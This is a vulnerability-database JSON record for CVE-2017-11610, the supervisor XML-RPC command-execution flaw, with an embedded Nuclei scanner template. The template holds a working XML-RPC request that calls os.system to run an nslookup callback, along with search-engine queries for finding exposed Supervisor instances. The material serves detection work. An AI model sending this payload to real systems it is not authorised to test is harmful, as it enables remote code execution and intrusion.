{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-11610/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-11610/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-11610/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-11610/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-11610/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-11610"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-11610"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2017/CVE-2017-11610.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2017-11610\n\ninfo:\n  name: XML-RPC Server - Remote Code Execution\n  author: notnotnotveg\n  severity: high\n  description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n  remediation: |\n    Apply the latest security patches or disable the XML-RPC server if not required.\n  reference:\n    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-11610\n    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/\n    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/\n    - http://www.debian.org/security/2017/dsa-3942\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2017-11610\n    cwe-id: CWE-276\n    epss-score: 0.87378\n    epss-percentile: 0.99748\n    cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: supervisord\n    product: supervisor\n    shodan-query:\n      - http.title:\"Supervisor Status\"\n      - http.title:\"supervisor status\"\n    fofa-query: title=\"supervisor status\"\n    google-query: intitle:\"supervisor status\"\n  tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /RPC2 HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/xml\n        Content-type: text/xml\n\n        <methodCall>\n          <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n          <params>\n            <param>\n              <string>nslookup {{interactsh-url}}</string>\n            </param>\n          </params>\n        </methodCall>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: header\n        words:\n          - \"text/xml\"\n\n      - type: word\n        part: body\n        words:\n          - \"<methodResponse>\"\n          - \"<int>\"\n        condition: and\n# digest: 4a0a00473045022100dbcfd9d331b631d70970277232bf8d0c632e644729a8e3133fb271eb5e39248202204c54fd7c4a672c5015d16378b723845c13116e997bf49627d68aefd19fbe5544:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2017-11610"
}